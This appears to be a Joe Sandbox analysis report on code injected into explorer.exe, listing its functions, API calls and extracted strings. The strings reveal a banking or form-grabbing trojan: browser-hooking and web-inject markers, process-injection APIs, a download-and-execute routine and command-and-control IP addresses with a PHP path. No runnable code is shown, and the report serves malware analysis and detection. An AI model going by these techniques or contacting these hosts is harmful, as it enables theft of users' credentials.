Thread32Next 113022->113019 113022->113027 113023 e8f7d57 GetCurrentThreadId 113023->113022 113023->113027 113024 e8f7d6b HeapAlloc 113024->113019 113025 e8f7d8f 113024->113025 113025->113027 113026 e8f7d99 HeapReAlloc 113026->113019 113026->113027 113027->113019 113027->113022 113027->113023 113027->113024 113027->113026 113029 e8f8322 _DllMainCRTStartup 113028->113029 113032 e8f83eb 113028->113032 113029->113032 113033 e8f83c4 SetThreadContext 113029->113033 113030 e90cb90 __get_qualified_locale 4 API calls 113031 e8f8413 113030->113031 113031->113013 113032->113030 113033->113029 113034 e8f8420 113035 e8f842f __termconin 113034->113035 113038 e8f8473 free 113034->113038 113036 e8f8440 OpenThread 113035->113036 113035->113038 113036->113035 113037 e8f845a ResumeThread 113036->113037 113037->113035 113039 e8f1a40 113084 e8f2880 113039->113084 113041 e8f1ab5 113042 e8f2880 36 API calls 113041->113042 113043 e8f1ac0 113042->113043 113093 e90c28c 113043->113093 113046 e8f1aed _ld12tod 113048 e8f1b0a SHGetFolderPathA lstrcatA lstrcatA PathFileExistsA lstrcmpiA 113046->113048 113047 e8f1ae1 lstrcpyA 113047->113046 113049 e8f1b79 lstrcmpiA 113048->113049 113050 e8f1bf1 lstrcatA 113048->113050 113049->113050 113051 e8f1b8d lstrcmpiA 113049->113051 113052 e8f1c0e lstrcmpiA lstrcmpiA 113050->113052 113051->113050 113053 e8f1ba1 lstrcmpiA 113051->113053 113054 e8f1c3c 113052->113054 113055 e8f1c41 113052->113055 113053->113050 113058 e8f1bb5 lstrcmpiA 113053->113058 113056 e8f1c45 PathFindFileNameW CreateThread 113054->113056 113055->113056 113057 e8f1c6b 113055->113057 113056->113057 113110 e8f2940 113057->113110 113058->113050 113059 e8f1bc9 lstrcmpiA 113058->113059 113059->113050 113061 e8f1bdd lstrcmpiA 113059->113061 113061->113050 113061->113052 113062 e8f1e6d 113117 e90c24c 113062->113117 113063 e8f1c83 113063->113062 113065 e8f1cf5 113063->113065 113067 e8f1d16 _ld12tod 113065->113067 113115 e8f19f0 GetNativeSystemInfo _DllMainCRTStartup 113065->113115 113066 e8f1e75 113068 e90c24c free 7 API calls 113066->113068 113070 e8f1d49 wsprintfA CreateFileA WriteFile WriteFile 113067->113070 113071 e8f1e7d 113068->113071 113073 e8f1ddc 6 API calls 113070->113073 113074 e8f1e64 __termconin 113070->113074 113075 e90c24c free 7 API calls 113071->113075 113072 e8f1d04 113076 e8f1d08 113072->113076 113077 e8f1d23 TerminateProcess 113072->113077 113073->113074 113074->113062 113078 e8f1e85 113075->113078 113116 e8f1370 45 API calls 6 library calls 113076->113116 113077->113067 113080 e90c24c free 7 API calls 113078->113080 113081 e8f1e8e 113080->113081 113082 e90cb90 __get_qualified_locale 4 API calls 113081->113082 113083 e8f1ea0 113082->113083 113085 e8f288e 113084->113085 113086 e8f2896 WideCharToMultiByte 113084->113086 113085->113041 113087 e8f28cf 113086->113087 113088 e8f28e1 113086->113088 113087->113041 113089 e90c28c malloc 34 API calls 113088->113089 113090 e8f28f0 113089->113090 113091 e8f28f8 WideCharToMultiByte 113090->113091 113092 e8f2922 113090->113092 113091->113092 113092->113041 113094 e90c320 113093->113094 113095 e90c2a4 113093->113095 113128 e90f988 DecodePointer 113094->113128 113097 e90c2dc HeapAlloc 113095->113097 113102 e90c305 113095->113102 113106 e90c30a 113095->113106 113109 e90c2bc 113095->113109 113125 e90f988 DecodePointer 113095->113125 113097->113095 113101 e8f1acd PathFindFileNameA 113097->113101 113098 e90c325 113129 e90e0b0 7 API calls _getptd_noexit 113098->113129 113101->113046 113101->113047 113126 e90e0b0 7 API calls _getptd_noexit 113102->113126 113127 e90e0b0 7 API calls _getptd_noexit 113106->113127 113109->113097 113122 e90f4b4 30 API calls 2 library calls 113109->113122 113123 e90f528 30 API calls 6 library calls 113109->113123 113124 e90fa08 GetModuleHandleExW GetProcAddress ExitProcess __crtCorExitProcess 113109->113124 113112 e8f2954 __crtGetStringTypeA_stat 113110->113112 113114 e8f299b __crtGetStringTypeA_stat 113110->113114 113111 e8f297c 113111->113063 113112->113111 113113 e90c28c malloc 34 API calls 113112->113113 113113->113114 113114->113063 113115->113072 113116->113067 113118 e90c251 free 113117->113118 113121 e90c281 free 113117->113121 113118->113121 113130 e90e0b0 7 API calls _getptd_noexit 113118->113130 113120 e90c271 GetLastError 113120->113121 113121->113066 113122->113109 113123->113109 113125->113095 113126->113106 113127->113101 113128->113098 113129->113101 113130->113120

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 0E8F4710 Relevance: 667.9, APIs: 171, Strings: 210, Instructions: 1153libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad$ByteCharMultiWide
                                                                                                                                                                                                                                                    • String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3$ HTTP/1.1$%s|%s|%s|%d|$.exe$/VzCAHn.php$176.111.174.140$176.111.174.177$:Zone.Identifier$Accept-Encoding$Advapi32.dll$ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$_errno$_strnicmp$bot|%d|%d|%d|%d|%s|%s|%d|%d$chunked$close$closesocket$connect$firefox.exe$form|%s|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$version.dll$wininet.dll$ws2_32.dll$wsprintfA
                                                                                                                                                                                                                                                    • API String ID: 2683923594-2476078022
                                                                                                                                                                                                                                                    • Opcode ID: 3cdae4264e59fa44a76ddc6eb33afbd33a25599150b51c307d753c5c40edee6b
                                                                                                                                                                                                                                                    • Instruction ID: b2335754b6f178b1a1a456ccc4c48ebf2d68422d7d5ee3efcb4a1add6a18df31
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3cdae4264e59fa44a76ddc6eb33afbd33a25599150b51c307d753c5c40edee6b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1E03F178602F85A6EE51EB61F89879573B9F749B90F505A2AC98D33734EF38C294C340
                                                                                                                                                                                                                                                    Function 0E8F1A40 Relevance: 84.3, APIs: 35, Strings: 13, Instructions: 267stringfilethreadCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8a0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$lstrcmpi$Write$Pathfree$_errnolstrcat$CreateFindHeapNamelstrlen$AllocByteCharCloseErrorExistsFolderFreeHandleLastMultiProcessTerminateThreadWide_callnewhlstrcpymallocwsprintf
                                                                                                                                                                                                                                                    • String ID: --disable-http2 --use-spdy=off --disable-quic$AVGBrowser.exe$AvastBrowser.exe$Diamotrixed$\\.\pipe\%s$brave.exe$browser.exe$chrome.exe$firefox.exe$msedge.exe$opera.exe$taskmgr.exe$trusteer
                                                                                                                                                                                                                                                    • API String ID: 3240663557-1393645298
                                                                                                                                                                                                                                                    • Opcode ID: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction ID: 32e4ad25a0d33758283c503a7c6fc95c297d803349a03a0dcc210ab575ee73f1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 578a9fe039579eb9e9f0177c9dc9f51626041ae0248464b788afb4379fcdbc8a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C16C76704B8ACAEB14DF66E85439A73A1FB88B88F800555DE4E57B68DF3CC549CB00
                                                                                                                                                                                                                                                    Function 0E8F6700 Relevance: 58.9, APIs: 39, Instructions: 363stringnetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 94 e8f6700-e8f67c4 call e9046a0 call e92f720 lstrcatA * 5 99 e8f67c6-e8f67ca 94->99 100 e8f6820-e8f686e lstrcatA call e92f798 94->100 99->100 102 e8f67cc-e8f681a lstrcatA wsprintfA lstrcatA * 2 99->102 104 e8f6cf5 100->104 105 e8f6874-e8f688f socket 100->105 102->100 106 e8f6cfc 104->106 105->106 107 e8f6895-e8f68a2 gethostbyname 105->107 109 e8f6cff-e8f6d05 call e92f6b0 106->109 107->106 108 e8f68a8-e8f68e8 memcpy htons call e92f7b8 107->108 108->106 114 e8f68ee-e8f6913 lstrlenA call e92f7c0 108->114 113 e8f6d0b-e8f6d5e call e92f7d0 call e92f7d8 call e90cb90 109->113 114->106 120 e8f6919-e8f6920 114->120 122 e8f693a-e8f6971 call e9046a0 120->122 123 e8f6922-e8f692c call e92f7c0 120->123 130 e8f6980-e8f699b call e92f7c8 122->130 129 e8f6932-e8f6934 123->129 129->106 129->122 130->106 133 e8f69a1-e8f69a4 130->133 134 e8f6aba-e8f6ac9 133->134 135 e8f69aa-e8f69b3 133->135 134->106 137 e8f6acf-e8f6ad4 134->137 135->134 136 e8f69b9-e8f69c2 135->136 136->134 138 e8f69c8-e8f69cf 136->138 137->130 139 e8f6d65-e8f6d6a call e90d1c8 138->139 140 e8f69d5-e8f69e3 138->140 142 e8f6a0a-e8f6a1f lstrlenA 140->142 143 e8f69e5-e8f69fb call e92f768 140->143 146 e8f6ad9-e8f6ae0 142->146 147 e8f6a25-e8f6a3b StrStrA 142->147 143->106 158 e8f6a01-e8f6a05 143->158 149 e8f6aec-e8f6aee 146->149 150 e8f6ae2-e8f6ae4 146->150 151 e8f6a3d-e8f6a56 call e92f768 147->151 152 e8f6ab4 147->152 155 e8f6c8c-e8f6c8f 149->155 156 e8f6af4-e8f6b28 malloc 149->156 150->106 153 e8f6aea 150->153 163 e8f6a7e-e8f6a90 call e92f768 151->163 164 e8f6a58-e8f6a76 strtol 151->164 157 e8f6ab6 152->157 153->156 161 e8f6cdc-e8f6cf3 malloc 155->161 162 e8f6c91-e8f6cac malloc 155->162 160 e8f6b30-e8f6b4f call e92f7c8 156->160 157->134 158->157 160->109 173 e8f6b55-e8f6b57 160->173 161->113 166 e8f6cb0-e8f6cc3 call e92f7c8 162->166 163->152 175 e8f6a92-e8f6ab0 call e92f768 163->175 164->106 167 e8f6a7c 164->167 171 e8f6cc9-e8f6ccb 166->171 167->152 171->106 174 e8f6ccd-e8f6cd2 171->174 176 e8f6c5e-e8f6c60 173->176 177 e8f6b5d-e8f6b65 173->177 174->166 178 e8f6cd4-e8f6cda 174->178 175->152 181 e8f6c63-e8f6c6a 176->181 177->176 180 e8f6b6b-e8f6b73 177->180 178->113 180->176 183 e8f6b79-e8f6b80 180->183 181->160 184 e8f6c70 181->184 185 e8f6d5f-e8f6d64 call e90d1c8 183->185 186 e8f6b86-e8f6bb8 strtol 183->186 184->109 185->139 186->109 188 e8f6bbe-e8f6bc0 186->188 188->109 190 e8f6bc6 188->190 191 e8f6bcc-e8f6bd8 190->191 192 e8f6c75-e8f6c87 190->192 193 e8f6bda-e8f6bee realloc 191->193 194 e8f6bf2-e8f6bf8 191->194 192->113 193->194 195 e8f6c00-e8f6c1e call e92f7c8 194->195 195->109 198 e8f6c24-e8f6c28 195->198 198->195 199 e8f6c2a-e8f6c43 call e92f7c8 198->199 199->109 202 e8f6c49-e8f6c5c 199->202 202->181
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$recv$lstrcmpi$lstrlenmallocsendstrtol$Startupclosesocketconnectfreegethostbynamehtonslstrcpymemcpyreallocsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 242761410-0
                                                                                                                                                                                                                                                    • Opcode ID: 88932a5f93bb323a67f3ba8164c9f3d1da2451f7a95ae3c1744d9f05ffd79559
                                                                                                                                                                                                                                                    • Instruction ID: 6c77df77e3b7c505f664336fcc0eb3476c664936544fb65390951f7a5a1cf1cc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88932a5f93bb323a67f3ba8164c9f3d1da2451f7a95ae3c1744d9f05ffd79559
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BCF1B132300AC1DADF309F26E8547AA77A1FB48B88F445629CF8A97B64EF39C544D740
                                                                                                                                                                                                                                                    Function 0E9047E0 Relevance: 21.1, APIs: 14, Instructions: 142stringfilenetworkCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32 ref: 0E904882
                                                                                                                                                                                                                                                    • InternetCrackUrlA.WININET ref: 0E904897
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcpyA.KERNEL32 ref: 0E8F675E
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F676F
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6783
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6797
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67A8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67BC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F67DA
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: wsprintfA.USER32 ref: 0E8F67F2
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6806
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F681A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrcatA.KERNEL32 ref: 0E8F6856
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: WSAStartup.WS2_32 ref: 0E8F6866
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: socket.WS2_32 ref: 0E8F6882
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: gethostbyname.WS2_32 ref: 0E8F6899
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: memcpy.MSVCRT ref: 0E8F68B9
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: htons.WS2_32 ref: 0E8F68C8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: connect.WS2_32 ref: 0E8F68DF
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: lstrlenA.KERNEL32 ref: 0E8F68F5
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F6700: send.WS2_32 ref: 0E8F690B
                                                                                                                                                                                                                                                    • PathFindFileNameA.SHLWAPI ref: 0E904911
                                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32 ref: 0E90492F
                                                                                                                                                                                                                                                    • GetTempFileNameA.KERNEL32 ref: 0E904945
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E904955
                                                                                                                                                                                                                                                    • lstrcatA.KERNEL32 ref: 0E904961
                                                                                                                                                                                                                                                    • CreateFileA.KERNEL32 ref: 0E90498A
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32 ref: 0E9049AF
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0E9049BE
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0E9049C7
                                                                                                                                                                                                                                                    • ShellExecuteA.SHELL32 ref: 0E9049F5
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32 ref: 0E904A04
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0E904A0F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$File$CloseHandleNamePathTempfreelstrlen$CrackCreateExecuteFindInternetShellStartupWriteconnectgethostbynamehtonslstrcpymemcpysendsocketwsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3619236930-0
                                                                                                                                                                                                                                                    • Opcode ID: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction ID: 00a1c934a931c6552601b8afc36e8dc3de726b350a6f8402cec3ff601d348e88
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97a27da750dbaef977a4fcaa9c0cc70f49c7afad1b0052307450f1bb4b21f581
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B51AF32704A80AAEF20CF62E85479E77B4F788B88F804425DF4A67B68DF38C545CB00
                                                                                                                                                                                                                                                    Function 0E904B50 Relevance: 9.1, APIs: 6, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32 ref: 0E904C09
                                                                                                                                                                                                                                                    • GetComputerNameW.KERNEL32 ref: 0E904C23
                                                                                                                                                                                                                                                      • Part of subcall function 0E8FEA80: WideCharToMultiByte.KERNEL32 ref: 0E8FEAC3
                                                                                                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32 ref: 0E904C4C
                                                                                                                                                                                                                                                    • GetVersionExA.KERNEL32 ref: 0E904C5D
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 0E904CA3
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: EnterCriticalSection.KERNEL32 ref: 0E8F88D8
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: RtlInitializeCriticalSection.NTDLL ref: 0E8F88E5
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcpyA.KERNEL32 ref: 0E8F891A
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcpyA.KERNEL32 ref: 0E8F893D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcatA.KERNEL32 ref: 0E8F894D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrcatA.KERNEL32 ref: 0E8F895D
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: LeaveCriticalSection.KERNEL32 ref: 0E8F89E4
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: memcpy.MSVCRT ref: 0E8F89FC
                                                                                                                                                                                                                                                      • Part of subcall function 0E8F8890: lstrlenA.KERNEL32 ref: 0E8F8A0A
                                                                                                                                                                                                                                                    • free.MSVCRT ref: 0E904CB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CriticalSection$Namelstrcatlstrcpy$ByteCharComputerEnterInfoInitializeLeaveMultiNativeSystemUserVersionWidefreelstrlenmemcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2800961625-0
                                                                                                                                                                                                                                                    • Opcode ID: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction ID: 29dedc14fe81ee1ebcbc28cdd3dc234a74d6e557455aa01aba44659245555d5e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ee94f24616c3bc1f4c948cfa2b9c388dded86d6c9ce121c8cf051fea961840d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB415C32614A809AEB20DF21E8447DEB7B5FB88788F844515EB4D57A68EF78C649CB40
                                                                                                                                                                                                                                                    Function 0E8F7CF0 Relevance: 9.1, APIs: 6, Instructions: 73memorythreadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1083 e8f7cf0-e8f7d1d call e90ab3c 1086 e8f7df6-e8f7e0d call e90cb90 1083->1086 1087 e8f7d23-e8f7d3a call e90ab54 1083->1087 1092 e8f7ded-e8f7df0 call e91f030 1087->1092 1093 e8f7d40-e8f7d45 1087->1093 1092->1086 1094 e8f7d4b-e8f7d55 call e91f188 1093->1094 1095 e8f7dd0-e8f7de7 Thread32Next 1093->1095 1094->1095 1099 e8f7d57-e8f7d61 GetCurrentThreadId 1094->1099 1095->1092 1095->1093 1099->1095 1100 e8f7d63-e8f7d69 1099->1100 1101 e8f7d6b-e8f7d8d HeapAlloc 1100->1101 1102 e8f7d91-e8f7d97 1100->1102 1101->1092 1103 e8f7d8f 1101->1103 1104 e8f7d99-e8f7db3 HeapReAlloc 1102->1104 1105 e8f7dc0-e8f7dcd 1102->1105 1103->1105 1104->1092 1106 e8f7db5-e8f7dbd 1104->1106 1105->1095 1106->1105
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocCurrentHeap$CloseHandleNextProcessThreadThread32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3234909527-0
                                                                                                                                                                                                                                                    • Opcode ID: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction ID: a39fda338ff48808f80604d1be8ce05e35af265fe51bbd44ef3272c1ce709eac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b9282383034dc6f92657966502109fcf4811ea107f9554322e173f2b13dec5f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F317132210785C6EB25EF21E454329B3A1FB88B98F848726DB5D87798DF39C945CF40
                                                                                                                                                                                                                                                    Function 0E8F6F50 Relevance: 4.6, APIs: 3, Instructions: 102memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_e8f0000_explorer.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocVirtual$InfoSystem
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2622297391-0
                                                                                                                                                                                                                                                    • Opcode ID: 207db36dd968614ec5fdf9e67daaca12f7b6b185ec7fc514b20ce8a3c0cbf7d9
                                                                                                                                                                                                                                                    • Instruction ID: 57dc73b6ddf09d7593effa43656813a1a22e464b8d93292c018e5ec864f8bb0f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 207db36dd968614ec5fdf9e67daaca12f7b6b185ec7fc514b20ce8a3c0cbf7d9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF316D22726B45C5FF218F26E510369A6A1FB88FC8F084536DF4D97B98EF7AC9418740
                                                                                                                                                                                                                                                    Function 0E8F1670 Relevance: 42.1, APIs: 23, Strings: 1, Instructions: 149networksleepmemoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.3, xrefs: 0E8F1693
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.3084970454.000000000E8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E8F0000, based on PE: true
